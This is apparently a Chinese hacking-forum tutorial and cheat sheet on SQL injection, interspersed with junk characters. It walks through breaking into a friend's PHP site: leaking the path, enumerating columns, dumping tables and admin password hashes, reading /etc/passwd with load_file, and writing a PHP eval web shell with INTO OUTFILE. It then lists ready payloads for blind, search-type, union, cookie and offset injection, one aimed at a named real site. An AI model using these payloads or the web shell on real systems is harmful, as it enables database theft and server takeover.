我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~1 f# R- x$ U+ o+ c+ g; _
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?% ^! K7 h4 k9 |7 R2 Y& ^2 [
我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。- L% _. [" i+ r3 g. f% [' \
如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)' N1 N$ U- H% M( l
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,); r U2 \% w2 Z! N+ {4 b. e
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:$ T+ J1 O) r7 Y& R5 I: l d# [' _
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
5 l# J% ~: V m. M o& Y8 x0 y/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入
5 L1 ? F/ E" T% H6 \ 7 N# c2 A- b% S% r3 O" T
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
5 n0 {2 d/ g9 [3 t3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3 ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意0 @" |" P5 ~# M4 O" H2 _
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息% l+ Y/ J8 b5 D- K
5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。6 Z7 T; {& x, ~, x0 \0 j+ f
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,
" m7 B$ t& F) H+ a2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。
8 y, W0 H4 H& W. N3 e6 U' N我就用的是第二个思路,
7 z0 n+ ]* v$ x! C* ~$ s提交and 1=2 union select 1,2,3,4,table_name,6,7,8 from information_schema.tables where table_schema=database() limit 0,1--
) M1 | Y6 c [& N: `$ }* c5 B6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,( S. s, d, _9 j9 `# {' @3 u4 g
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
. V W3 j0 i! X# Q注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。
; e/ X k$ w, @7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
" _ \* {! {5 f8 ~是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
$ \% B2 B* ~+ g3 Y f/ t提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --
+ q% ~' S m# C3 I然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,
# P* z) {, S8 c8 F5 c1 i& ?调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限....... b' P/ F6 N9 c( ~; m* X) s% j
下面是一些很普遍注入方式资料:
4 c5 C7 C H7 b5 G注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='1 V8 ?& Q: l2 B. q9 M! K+ J
拆半法
# J( o3 U5 L S9 B# c1 I; i######################################
1 u3 X- W2 c3 P& T, j' k. D9 land exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。$ X: n) b; g+ |# h5 ]) C! n* Z
and exists (select * from admin), @, d$ ^9 q' B6 c$ ^
and exists(select id from admin)
8 y5 l R* u @( j$ |0 B4 A; @and exists(select id from admin where id=1)
! x7 e+ O1 P Vand exists(select id from admin where id>1) + S2 t% W/ B2 M5 g
然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围 # j0 v2 l V5 y; N
and exists (select username from admin)
9 p2 R, I3 S" O) ~6 |( Nand exists (select password from admin)
; a+ d S2 u2 A3 r1 h" p) U: T. `; Y! Oand exists (select id from admin where len(username)<10 and id=1)
) X) k% d, G3 e9 k) E% S) @0 Land exists (select id from admin where len(username)>5 and id=1)) c0 m+ Z' V7 g' Q3 a
and exists (select id from admin where len(username)=6 and id=1)- ~/ I; \% E" F, E9 C* f- t
and exists (select id from admin where len(password)<10 and id=1)
8 A z+ s! t2 @8 ~- G& j- zand exists (select id from admin where len(password)>5 and id=1)
9 b' ^5 z9 a# land exists (select id from admin where len(password)=7 and id=1)
- F, E5 f& `: f, k3 Iand (select top 1 asc(mid(username,1,1)) from admin)=97/ |* A0 o" G6 i5 [! B
返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。
+ O3 e$ V' d5 J" H3 K N猜第二位把username,1,1改成username,2,1就可以了。3 _6 {8 u- r" F" h" E3 ^
猜密码把username改成password就OK了
+ ?! _+ L0 `# i##################################################
0 u2 D A) u& |6 k: V, _搜索型注入
5 i0 O) ?' ?6 c. k; W##################################! }, P) W2 d1 `3 ~
%' and 1=1 and '%'='
2 R8 v, E: d; w! Y; {%' and exists (select * from admin) and '%'='2 S- C. T: m( C- J# X6 Q4 j
%' and exists(select id from admin where id=1) and '%'='
7 ]: l2 L* D2 X- C%' and exists (select id from admin where len(username)<10 and id=1) and '%'='; [8 y& v1 |2 A$ }7 R+ @ p) T& F
%' and exists (select id from admin where len(password)=7 and id=1) and '%'='7 J; ^% g7 u3 @& h, `- Q/ v p
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
+ \5 [+ u" i1 N s这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='
/ T$ G7 T2 b( C$ D对于MSSQL数据库,后面可以吧 and '%'='换成--9 V1 K2 \* F/ F
还有一点搜索型注入也可以使用union语句。2 X# p7 V6 s9 r/ C: l
########################################################
6 E* C" `5 u, O" ?, b! F联合查询。
: j: d( C+ }0 }' @; U/ i ~#####################################
1 `) B5 o' q. S7 f/ ~2 G* norder by 10& W" ~4 l! X# ?) z) o l
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
7 z' S C4 z+ i# Land 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin' I/ O4 D$ o" T8 b
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
^4 k( y0 H# T3 w很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)
" U+ L# K2 {, C###################################
( @% U* _+ U6 x) v" V7 K% _) {cookie注入6 _7 Y' \8 f/ |6 l+ t! [6 C
###############################
; [. h3 V0 H" d& g& f5 ^http://www.******.com/shownews.asp?id=127
0 H* m) s: A8 D8 ~$ S" chttp://www.******.com/shownews.asp4 p8 C* [8 x, q% e3 K- t/ z! b( S+ y
alert(="id="+escape("127"));
9 I5 A3 H0 ~( x* j% H7 k6 Z8 Kalert(="id="+escape("127 and 1=1"));
% K) F5 v @) I* p* C; g1 m( Jalert(="id="+escape("127 order by 10"));, @. A4 a; l. }( I. u
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));% p; p# m8 ]: _" K6 E0 s
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));+ s* ]' L { R1 e2 W) ]3 x
这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。
# E8 J8 ~5 R4 W* H* G###################################! B- y7 ?6 f+ @' ]' H/ P3 F
偏移注入/ |& z- G3 a: L) A8 b5 O$ w% E. e
###########################################################/ m" A+ U7 ]- o8 _+ j
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
& W5 T0 ^5 v$ T, h! Runion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin @2 q9 l! J0 ?% i- x
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)" H: z/ p# g: o* X' L
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)5 p% m, A0 ]+ A5 o; f Q) ]
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
0 }2 x: p' t+ D/ y! t& b' _$ lunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)6 C% m3 M2 N* T1 ]
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
" t+ i+ n4 \) t2 ra.id=d.id)
* @3 U: K& J4 b0 Pand 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
, e# N. U b2 r5 h- R% N5 ^! Uand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) 8 ?% O% @2 v: J& P
4 Q% _2 P8 M' J! G# `9 T============================================================================================================
4 W" m r! L& o! _1.判断版本, c3 m' ]! i V
and ord(mid(version(),1,1))>51
7 N$ G3 { I3 h# @; I3 T返回正常,说明大于4.0版本,支持ounion查询5 B5 w& f# Z* j6 ^9 ]3 W
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解
8 v3 s6 H4 U& L3 o2 ~% ^and 2=4 union select 1,2,3,4,5,6,7,8,9--" s5 m& M( F- g0 X0 [! Y" Q
3.查看数据库版本及当前用户,
! ^8 ~) O2 W! w) ^and 2=4 union select 1,user(),version(),4,5,6,7,8,9--% I- p2 l+ y9 e/ g# R. W Q7 B
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,) l- @3 u. D6 ^/ Z! `2 L6 |; y
4.判断有没有写权限
& p& _( b. m; L8 band (select count(*) from MySQL.user)>0--
r8 ~1 ]. `7 d- }$ a5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1* e# ?) I: ~ A, U
用不了这个命令,就学习土耳其黑客手法,如下
- W$ P3 E; b) r8 ?" ^and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--, V6 p( y4 f1 y
6.爆表,爆库
$ ~$ }8 I. Q: I4 t" Cand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
# j! E4 V) u6 J& R) r, T7.爆列名,爆表" Q9 g7 ^! H& K2 W6 {
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--0 \# B; o$ u: p& }9 |, ^4 I
8.查询字段数,直接用limit N,1去查询,直接N到报错为止。
* S$ t s" B4 {+ K3 Wand+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--! n7 `5 Y. V8 u2 |% D O1 p5 }; a
9.爆字段内容
5 x9 M% |6 d! P# i& Xand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
* r8 h2 A; X7 ^. S: U, ^! ^% phttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1-- |